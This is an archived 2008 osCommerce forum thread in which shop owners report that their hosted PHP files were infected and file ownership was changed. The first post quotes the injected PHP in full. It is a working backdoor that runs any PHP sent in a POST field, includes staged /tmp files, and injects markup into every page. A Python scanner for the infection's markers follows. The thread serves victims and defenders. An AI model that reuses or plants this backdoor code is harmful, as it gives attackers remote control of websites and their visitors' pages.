mshisha Posted November 12, 2008

Well, it looks like I was hacked for the 3rd time. My website front was running fine BUT every file had added to it this:

```php
if(!function_exists('tmp_lkojfghx')){
  // include the first file found among /tmp/m1 .. /tmp/m99
  for($i=1;$i<100;$i++)
    if(is_file($f='/tmp/m'.$i)){include_once($f);break;}
  // backdoor: evaluates PHP sent in the POST field tmp_lkojfghx3
  if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
  // markup that the output handler below adds to every page
  if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('[long base64 string removed]'));
  // output-buffer handler: strips an earlier copy of the markup, then re-adds it
  function tmp_lkojfghx($s){
    if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));
    $s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBo ZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);
    if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);
    elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
    return $g?gzencode($s):$s;
  }
  // error handler: restarts output buffering with tmp_lkojfghx as the outermost handler
  function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){
    $s=array();
    if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
    foreach(@ob_get_status(1) as $v)
      if(($a=$v['name'])=='tmp_lkojfghx')return;
      else $s[]=array($a=='default output handler'?false:$a);
    for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}
    ob_start('tmp_lkojfghx');
    for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}
  }
}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;
tmp
```

PLUS looking at the files - the "ownership" had been changed and the database name was a different one. Calling my webhosters resulted in absolutely nothing, no help, they did not understand and I don't know enough to fully understand either. I have all my file permissions to the minimum to operate but to no avail. I am seriously fed up.

The database was called kulu sota

Just to let anyone else know out there of these problems - oh and do not use ixwebhosting - no customer service

spooks Posted November 12, 2008

1. Change host. I recommend you look at http://www.reviewcentre.com/products100.html and choose a host with good scores + plenty of reviews; do a web search on any you're considering.

2. Secure your site. http://www.oscommerce.com/forums/index.php?showtopic=313323

Sam

abuata Posted November 23, 2008

Same thing happened to me. On 8/11/08 "thegrand" took control of almost all of my files. I did not catch it till now. Funny thing is that ixwebhosting sent me an email on 8/11/08 informing me that they moved my site to another server due to too much traffic. I am convinced they knew they were attacked, that's why they moved me. Now they say it is not them, it was all my fault. ixwebhosting is crap!

I would like to clean my files now that they "fixed" the ownership back to me, but now I cannot identify them. I would like to know if there is a way to clean this exploit attacker out of all my files? I am changing hosting co. ASAP. I do not want to have to blow my site and all my mods to start over. Does anyone have an idea for an easier fix?

BTW - I have 3 sites that were attacked, and one of them was not even an osC site. :angry:

Thanks

jdodgen Posted December 8, 2008

tmp_lkojfghx

I too got the same hack, all my php files had the added code, and I am also on ixwebhosting ... they told me it was MY problem. All my php files and html files had the ownership changed to "edjackso". Now the difficulty I have with this is you have to be root to change the file ownership, a normal user cannot do this. So I have spent the better part of the day fixing things up.
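
One way to identify the affected files and the changed ownership described in this thread, as an added example (not code from any poster or from osCommerce): it searches web files for the two identifiers from the injected block, flags files whose owner differs from an expected uid, and lists any /tmp/m1 to /tmp/m99 files that the injected loop would include. The function names, the extension list and the constructed sample tree are assumptions; the script only reports and changes nothing.

```python
import os
import tempfile

# Identifiers taken from the injected block quoted in the first post.
MARKERS = (b"tmp_lkojfghx", b"TMP_XHGFJOKL")
WEB_EXTS = (".php", ".html", ".htm", ".inc", ".js")  # assumption: types to scan

def scan_tree(root, expected_uid=None):
    """Return one finding per web file holding a marker or an unexpected owner."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith(WEB_EXTS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
                uid = os.stat(path).st_uid
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            hits = [m.decode() for m in MARKERS if m in data]
            wrong_owner = expected_uid is not None and uid != expected_uid
            if hits or wrong_owner:
                findings.append({"path": path, "markers": hits,
                                 "uid": uid, "wrong_owner": wrong_owner})
    return findings

def staged_includes(tmp_dir="/tmp"):
    """List the m1 .. m99 files that the injected loop tries to include."""
    names = (os.path.join(tmp_dir, "m%d" % i) for i in range(1, 100))
    return [p for p in names if os.path.isfile(p)]

def demo():
    """Scan a constructed sample tree; no real site or /tmp is touched."""
    root = tempfile.mkdtemp()
    samples = {"index.php": b"<?php echo 'ok'; ?>",
               "cart.php": b"<?php if(!function_exists('tmp_lkojfghx')){} ?>",
               "notes.txt": b"tmp_lkojfghx mentioned in a text file",
               "m7": b"constructed stand-in for a staged include"}
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    return scan_tree(root, expected_uid=os.getuid()), staged_includes(root)

if __name__ == "__main__":
    found, staged = demo()
    print(found, staged)
```

On a real account, `scan_tree` would be pointed at the web root with the account's own uid, and `staged_includes()` run with its default `/tmp`.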
This topic is now archived and is closed to further replies.